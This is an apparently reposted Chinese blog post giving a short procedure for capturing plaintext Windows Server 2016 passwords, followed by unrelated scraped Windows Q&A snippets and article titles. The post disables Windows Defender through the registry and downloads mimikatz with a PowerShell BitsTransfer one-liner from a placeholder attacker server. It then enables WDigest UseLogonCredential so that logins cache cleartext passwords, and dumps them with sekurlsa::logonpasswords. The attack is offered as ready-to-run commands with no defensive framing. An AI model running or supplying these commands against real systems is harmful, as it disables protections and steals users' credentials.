程序员经验分享-hwhale

Windows Server 2016抓取明文密码

2023-10-27

临时禁止Windows Defender

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
gpupdate /force

下载mimikatz后解压缩。

powershell.exe -NoP -NonI -Exec Bypass -Command "& {Import-Module BitsTransfer; Start-BitsTransfer 'http://你的服务器/mimikatz_trunk.zip' "%APPDATA%\mimikatz_trunk.zip"}"

修改注册表开启UseLogonCredential

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

等用户下次再登录的时候,可抓到明文密码

mimikatz.exe privilege::debug
sekurlsa::logonpasswords exit

原文地址:https://bacde.me/post/Windows-Server-2016-Get-Plaintext-Password/

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

Windows Server

Windows

服务器

安全

Windows Server 2016抓取明文密码 的相关文章

  • Windows 上的 ruby​​ 中出现 SSL 错误

    我收到以下错误 C Users user Desktop folder gt ruby exchange rate rb C Ruby23 x64 lib ruby 2 3 0 net http rb 933 in connect nonb

  • 是否可以确定哪个键盘发送了按键?

    我有一个 Windows Media Center 遥控器 Windows 将其识别为键盘 当我使用 Windows Media Center 运行多显示器设置并在一个屏幕上播放视频时 遥控器的输入将与常规键盘一起定向到活动窗口 因此 当我

  • 如何使用 Windows API 检索 HD 供应商/序列号

    我说的是physical磁盘驱动器 而不是卷 分区 逻辑驱动器 所以通常建议GetVolumeInformation函数不适用于我的情况 确切地说 我直接使用尚未分区的磁盘 我通过打开它的句柄CreateFile功能 hDisk Creat

  • 找出用户属于哪些组

    我有一个刚刚创建的 Windows 用户帐户 以 XYZ 为例 此 XYZ 属于我在计算机管理 gt 本地用户和组中创建的用户组和自定义组 因此 在属性中我看到该用户属于 2 个组 现在我想获取这些组并显示它们 有什么建议么 我已经这样做了

  • 关于 Windows、原始鼠标数据的代码要 #include 哪些内容

    我发现下面的帖子对于做我自己的项目非常有用 那么新手问题是 我必须包含什么才能使其发挥作用 Link 如何准确测量具有已知 DPI 的鼠标的鼠标移动 以英寸或厘米为单位 https stackoverflow com questions 1

  • Windows Defender 检测 Python EXE 为木马

    我制作了一个 Python 脚本 将 Windows 目录以 zip 形式邮寄给我 我使用 sched 模块添加了一个调度程序 每小时重复一次 我试图制作一个简单的同步应用程序供个人使用 在 Windows 启动时启动 我使用将其转换为 e

  • 如何在 powershell 中更改其他用户的特定注册表设置

    Goal 要编辑特定用户 而不是其他用户 的特定注册表项设置 请在电源外壳 Known 操作系统 Windows 8 1 Embedded Industry Pro 与Win 8 1相同 但具有一些嵌入式功能 我可以在目标计算机上手动执行此

  • Linux 和 Windows 上的相同计算 --> 结果不同

    我编写了以下算法来将十进制值转换为二进制 十六进制等 string toFormatFromDecimal long long t Format format int digitCount ceil log t log int format

  • 如何使用 msilib 从 python 模块创建 .msi 文件的示例

    谁能给我一个如何使用 python 的例子msilib http docs python org library msilib html标准库模块从自定义 python 模块创建 msi 文件 例如 假设我有一个名为 Cool py 的自定

  • 如何从 Windows 反编译 Linux 二进制文件?

    如何从 Windows 反编译 Linux 二进制文件 so 谢谢 你可以试试回旋镖 http boomerang sourceforge net 您需要首先从源代码构建它 因为提供的二进制文件不涵盖这种情况 如果您绝对拒绝编译任何内容 请

  • Windows 桌面应用程序中是否有 API 函数可以获取电池电量?

    我正在创建一个桌面应用程序 我想在其中获取设备 笔记本电脑 的电池电量 我为此使用 C 有什么方法可以帮助我做到这一点吗 我已经在 Windows Phone 8 平台上使用Windows Phone Devices Power Batte

  • argc 和 argv 在 Windows 中没有用吗?

    在 Linux 中 argc 和 argv 计算终端中的参数 但在 Windows 中 我找不到放置第二个参数的地方 事实上 每次我运行该程序时 它都会创建那个丑陋的黑色窗口 我什至没有机会给出任何争论 那么这两个变量在Windows平台下

  • 防止单个可执行文件的多个进程实例

    我正在使用 NET 和 C 我想阻止同一可执行文件的两个实例同时运行 但我不想阻止从另一个文件夹运行的同一进程 例如 我有一个位于两个不同位置的可执行文件 C MyProject Master Program exe C MyProject

  • 字符串比较在 PowerShell 函数中不起作用 - 我做错了什么?

    我正在尝试创建一个别名git commit它还将消息记录到单独的文本文件中 然而 如果git commit回报 nothing to commit working directory clean 它不应该将任何内容记录到单独的文件中 这是我

  • 通过单个命令行操作确定操作系统

    介绍 我有一个 神奇 工具 如果我提供 IP 它可以在机器上执行命令行操作 该工具知道机器正在使用的操作系统 并根据是否是windows linux在cmd shell上执行命令 并盲目返回命令的输出 C gt 工具 exe 172 140

  • 适用于 Windows 的视频捕获 SDK 和框架 [关闭]

    Closed 这个问题需要多问focused help closed questions 目前不接受答案 我找不到描述 Windows 中视频捕获的所有不同选项的列表 我想将此列表保留给非专有 SDK 即 ImageSource 有自己的

  • C++编程风格

    我是一名老 但不是太老 Java 程序员 决定学习 C 但我见过很多 C 编程风格 嗯 实在是太丑了 将类定义放在头文件中 并将方法放在不同的源文件中的所有内容 突然调用函数 而不是使用方法课堂内 这一切似乎 都是错误的 那么最后 我还有什

  • 如何在 EXE 文件中找到要挂钩/绕行的函数地址?

    我又碰壁了 需要你帮助处理一些低级的事情 我已经成功挂钩导出的 DLL 函数 顺便说一句 用这个代码 https web archive org web 20100610091602 http newgre net ncodehook 通过

  • 我们可以从 Delphi 调用 Native Windows API 吗?

    是否可以从 Delphi 应用程序中调用内核 Native API 喜欢nt and zw系统调用 您确实可以从 Delphi 调用本机 API Delphi 不附带本机 API 的标头翻译 因此 您需要提供自己的翻译 或使用预先存在的翻译

  • 检测非 DPI 感知应用程序是否已扩展/虚拟化

    我正在尝试在 WinForms 应用程序中检测它是否由于操作系统具有高 DPI 而以缩放 虚拟化模式启动 目前 在以 3840x2400 缩放 200 缩放运行的系统中 应用程序将分辨率视为 1920x1200 DPI 为 96 缩放因子为

随机推荐

  • 解封装(七):av_read_frame读取帧数据函数分析和产生的空间问题分析,以及AVPacket分析

    1 在完成了视频的格式的解析 即音视频编码参数获取之后 我们就可以开始读取具体的音视频帧数据 av read frame 我们要忠实的是 函数调用之后是否应该涉及到清理方法 先看下上面函数的参数 AVFormatContext s 文件格式

  • hadoop之yarn

    简介 一 YARN是一个通用资源管理系统和调度平台 为集群在利用率 资源统一管理和数据共享等方面带来了巨大好处 1 通用指不仅支持mr程序 也支持其它计算程序 2 资源管理包括集群的硬件资源 cpu 内存等 3 调度平台指多个程序同时执行时

  • 反向题在测试问卷信效度_九种方法筛选无效问卷及对研究设计的启示

    引言 随着网络及智能手机的普及 传统的一些纸笔测验渐渐被网络问卷所替代 网络问卷由于其便捷性 很大程度上方便了研究者和被试 2018年JOM一篇文章发现越来越多的研究者开始使用网络问卷收集数据 相关发表的文章也呈现逐年增加的趋势 参见Por

  • Linux——进程优先级

    1 什么是优先级 优先级和权限息息相关 权限的含义为能还是不能做这件事 而优先级则表示 你有权限去做 只不过是先去做还是后去做这件事罢了 2 为什么会存在优先级 优先级表明了狼多肉少的理念 举个例子 在日常生活中我们进行排队看医生 队列就是

  • CSDN如何转载别人的文章(快速转载)

    1 找到要转载的文章 用chrome浏览器打开 右键选择检查 2 在chrome中下方的框里找到对应的内容 html脚本中找到对应的节点 article content 选中节点 网页上被选中内容会被高亮显示 然后右键菜单选中 Copy g

  • gcc -l参数和-L参数

    l参数和 L参数 l参数就是用来指定程序要链接的库 l参数紧接着就是库名 那么库名跟真正的库文件名有什么关系呢 就拿数学库来说 他的库名是m 他的库文件名是libm so 很容易看出 把库文件名的头lib和尾 so去掉就是库名了 好了现在我

  • 查询引擎中的代码生成技术

    目录 一 背景 二 相关知识 2 1 Java虚拟机规范 2 1 1 数据类型 2 1 2 字节码指令 2 1 3 class文件格式 2 2 虚函数与CPU预测 2 3 查询引擎 火山模型 三 代码生成工具 3 1 动态编译器Janino

  • upload-labs初学者通关详解

    Pass 1 js验证绕过 首先在开始之前我们需要在我们导入的upload labs文件里面新建一个文件夹 方便我们上传php文件 打开第一关我们可以看见这个页面 我们将事先准好好的一句话木马文件传上去 可以看到提示 文件夹格式不正确 这时

  • 开放平台 文档

    QQ http wiki opensns qq com wiki E3 80 90QQ E7 99 BB E5 BD 95 E3 80 91add share

  • 朴素贝叶斯Naive Bayes-机器学习ML

    参考 1 统计学习方法 李航 2 先验概率与后验概率的区别 http blog csdn net ouyang linux007 article details 7566339 3 朴素贝叶斯方法 Naive Bayes 原理和实现 htt

  • hydra详细介绍及渗透利用大全(超细)

    hydra小白渗透路上必须掌握的工具 历史我就不介绍了百度上更详细 本内容仅供参考 切勿做违法犯罪 若出事一切与本人无关 请大家遵守网络安全法 祝大家早日成为安全界的大佬 Hydra 参数介绍 R 根据上一次进度继续破解 S 使用SSL协议

  • Spark 写入ElasticSearch报错类型整理

    1 Cannot determine write shards for authorRecommender Author likely its format is incorrect maybe it contains illegal ch

  • MyBatis核心配置文件详解、配置标签解析及SqlSession工厂对象

    一 MyBatis核心配置文件概述 1 MyBatis核心配置文件层级关系 2 MyBatis常用配置解析 1 environments标签 数据库环境的配置 支持多环境配置 其中 事务管理器 transactionManager 类型有两

  • CentOS虚拟机搭建

    下载centos的镜像 https www virtualbox org wiki Downloads 创建虚拟机内部虚拟网络 virtual box菜单 管理 gt 主机网络管理器 gt 创建 手动配置网卡并将ip地址设为192 168

  • 流批一体技术框架探索及在袋鼠云数栈中的实践

    一 关于流批一体数据仓库 流批一体是一种架构思想 这种思想说的是同一个业务 使用同一个sql逻辑 在既可以满足流处理计算同时也可以满足批处理任务的计算 从效率层面来说 批处理只能以t 1的形式呈现业务数据 流处理只能以t 0的形式呈现业务数

  • C# System.ArgumentNullException:“值不能为 null。Arg_ParamName_Name”

    弹窗显示异常报错如下所示 问题根因 添加tab顺序 修改图中的tab顺序 修改为

  • 全民农场服务器维护,全民农场1月22日更新了什么_全民农场1月22日更新维护内容介绍_游戏堡...

    全民农场今日更新之后将上线非常多精彩的活动内容 下面小编就为大家介绍一下全民农场1月22日更新维护内容 全民农场 将于1月22日12 00 18 30不停机更新 快来看看新的农场消息 1 全新惊喜一周活动开启 1月22日更新后 1月28日

  • HTTP抓包利器Fiddler基础及进阶教程(二)---- 手机端抓包+强制全局代理

    本文将进一步介绍Fiddler在移动端抓包的方法 一 配置Fiddler 二 查看当前IP 方式有很多种 选择运行 输入 cmd 在输入Ipconfig 三 验证是否配置成功 将上一步拿到的 IP Fiddler端口号 组成的链接用浏览器打

  • 读书笔记(2018年3月)-《卓有成效的管理者》总结

    1 善用时间 有效的管理者知道他们的时间用在什么地方 他们所能控制的时间非常有限 他们会有系统地工作 来善用这有限的时间 1 记录时间 记录时间耗用的实际情形 2 诊断时间 做有系统的时间管理 首先要找出什么事根本不必做 这些事做了也完全浪

  • Windows Server 2016抓取明文密码

    临时禁止Windows Defender REG ADD HKEY LOCAL MACHINE SOFTWARE Policies Microsoft Windows Defender v DisableAntiSpyware t REG

热门标签